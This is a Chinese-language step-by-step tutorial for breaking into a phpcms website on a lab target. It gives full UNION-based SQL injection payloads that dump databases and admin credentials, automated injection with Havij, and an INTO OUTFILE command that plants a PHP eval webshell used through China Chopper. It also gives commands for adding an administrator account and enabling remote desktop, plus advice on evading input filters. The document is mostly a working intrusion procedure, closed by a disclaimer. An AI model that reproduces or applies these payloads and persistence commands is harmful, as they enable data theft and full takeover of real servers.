phpcms手工注入教程
目标服务器(靶机):192.168.1.27
目标网站:http://192.168.1.27:8083
步骤:
一、靶机操作
1、进入靶机,查看IP地址;
开始—运行,输入cmd回车,出现命令行窗口,输入:ipconfig
显示,靶机配置信息,记下以太网适配器下,IPv4地址(后面访问网页会用到)。
此处为192.168.1.27
2、启动phpstudy(桌面图标):
如果,显示不是两个绿色标志,则等待一会,按下重启按钮,再次尝试。
二、远程攻击机操作
1、打开攻击机
利用攻击机,访问靶机。http://192.168.1.27:8083(注意根据查看到的靶机IP地址,修改此处的IP,端口不变,以下截图中,均应将端口修改为8083),然后点击其中的一篇文章,如果地址栏出现http://***/xx.php?id=XX,则表明目标网站,采用PHP语言开发。
2、试探目标网站
分别在地址末尾添加单撇号、and 1=1 和 and 1=2 进行注入点探测。
如果单撇号出错、给出数据库信息,and 1=1正确执行,and 1=2显示空页面,则表明存在注入攻击点。
三、手工注入
非常重要:首先在网站找到管理入口,否则,呵呵就算有用户名和密码,没有入口,也是白玩。。
注入时,注意通过改变大小写、编码、转换等方式躲过系统检查,顺利执行语句!!!
步骤1:访问目标网站
随便点击其中一个新闻
步骤2:寻找注入点
在 URL 后加’(单引号)判断是否存在注入点,数据库报错。
步骤3:判断字段长度:
利用 order by N,从数字 1 开始替代 N,直到返回错误页面,判断字段长度为错误页面的 N-1,也就是最后一个正常页面返回。实验中N=16,错误,所以字段长度为15
步骤4:判断字段位置回显:
利用 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 最后一个数为字段长度,有回显会将相应数字显示出来。从下图可知,3 和 11 的位置可以回显信息。判断数据库信息:
步骤5:判断数据库信息:
利用 and 1=2 union select 1,2,sql_command,4,5,6,7,8,9,10,11,12,13,14,15 ,用 sql 指令替换 sql_command。
Sql_command为以下参数:
查看 mysql 版本 version()
查看当前数据库 database()
查看当前用户 user()
-
判断版本
-
判断数据库
-
判断用户
步骤6:判断mysql所有数据库:
利用 and 1=2 union select 1,2,group_concat(convert(SCHEMA_NAME using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.SCHEMATA,查看 mysql中所有数据库的名称。
由下图结果可知业务数据库为 cms。其他数据库有mysql,discuz,test等
步骤7:判断数据库表:
利用 and 1=2 union select 1,2,group_concat(convert(table_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() ,查看 cms 数据库拥有的所有表。可以发现存放用户信息的表cms_users。=
步骤8:判断数据表的所有列:
利用 and 1=2 union select 1,2,group_concat(convert(column_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x636D735F7573657273。
table_name=cms_users,表名需要编码为 16 进制。得到 3 个列:userid,username 和 password
从ASCII对照表中可知对应:c(63) m(6d) s(73) _(5f) u(75) s(73) e(65) r(72) s(73)
步骤9:判断管理员账号密码:
利用 and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,11,12,13,14,15 from cms.cms_users。得到管理员账号密码为:admin/e10adc3949ba59abbe56e057f20f883e(解密后123456)
登陆后台地址后台地址:http://192.168.1.27:8083/admin/login.php,SQL注入结束。
四、利用Havij进行自动化工具注入
在桌面,运行Havij.exe。
在Target后面的输入栏中,输入看到的目标网站的可注入网址。
注意:
(1)Target栏目中,输入内容,必须带上“http://”,并且,一定具有****.php?id=**特征。
(2)Database选择项,根据前面出错信息,自动检测。其他按图中所示进行选择即可。
(3)点击,Analyze,即可输出各种信息。
第一步:获取信息。点击info,查看基本信息。
第二步:获取数据库,表,列的信息。
依次点击TablesàGetDBs,得到靶机上的所有数据库信息(如果仅显示一个数据库,等待1分钟左右,再次点击即可),勾选mysql数据库,然后点击Get Tables,得到mysql数据库中的所有表的信息。
选择user、password列,点击Get Data得到当前数据库的用户名和密码加密后的值。
通过www.cmd5.com查询,得到对应的密码明文。
Root
第三步:登陆数据库
利用拿到的mysql数据库用户名密码登录数据库管理端。(此处省去发现该端口过程,可利用指纹扫描软件发现PHPmyadmin的管理端口)
访问http://192.168.1.27:8088/phpMyAdmin/,输入用户名密码,进入如下界面:
在数据库列表中,选中cms数据库。然后,在网页中部偏上位置,点击SQL,并执行SQL命令。
select ‘<?php eval($_POST[cmd]);?>’ into outfile ‘D:/WWW/cms/ma.php’
注意:此处如果将/写为\将不能执行。
此处,写入的目录,需要不断进行试探。。
网站根目录下面才是cms网站,所以此目录,对应的网址为:
http://192.168.1.27:8083/ma.php,利用菜刀连接此地址。
中国菜刀连接后,打开命令行界面:
输入http://192.168.1.27:8083/ma.php 口令为cmd。
然后右键点击添加条目,选择文件管理,即可看到目标靶机的磁盘情况。
即可下载、上传、删除文件等。
如果需要进行用户操作,则右键点击添加条目,选择虚拟终端,弹出类似DOS窗口的webshell。此窗口中可进行用户添加与权限提升。
打开虚拟终端后,执行net user,如果菜刀显示乱码,设置编码方式为GB2312即可。
以下操作,除非特殊说明,均在此webshell中进行。
五、命令
查看当前存在用户:
net user
查看当前用户组:
net localgroup
添加用户(以添加用户名username密码1234为例):
net user username 1234 /add
添加用户到组(以添加ls用户到Administrators组为例):
net localgroup Administrators username /add
查看用户组:
net localgroup administrators
即可看到所添加的用户,已经在管理员组了。
为了便于操作,还可以开启远程桌面开启。
如果,远程主机关闭了远程桌面功能,则有几种方法打开:在WEbshell窗口中,执行以下任一语句,即可远程打开远程桌面功能。
(1)REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
(2)wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1
(3)wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call setuserauthenticationrequired 1
以上三种方法,第一种用于xp和win2003,后两者适用与win7、8.
然后,然后,打开远程桌面,输入目标网站IP地址。
利用刚才创建的用户名、密码登录了。
可以查看文件,可以修改配置。
下载文件,还要在菜刀中进行。
本教程仅供网站进行渗透测试,请勿用于非法途径!!造成任何危害,均由个人负全责!!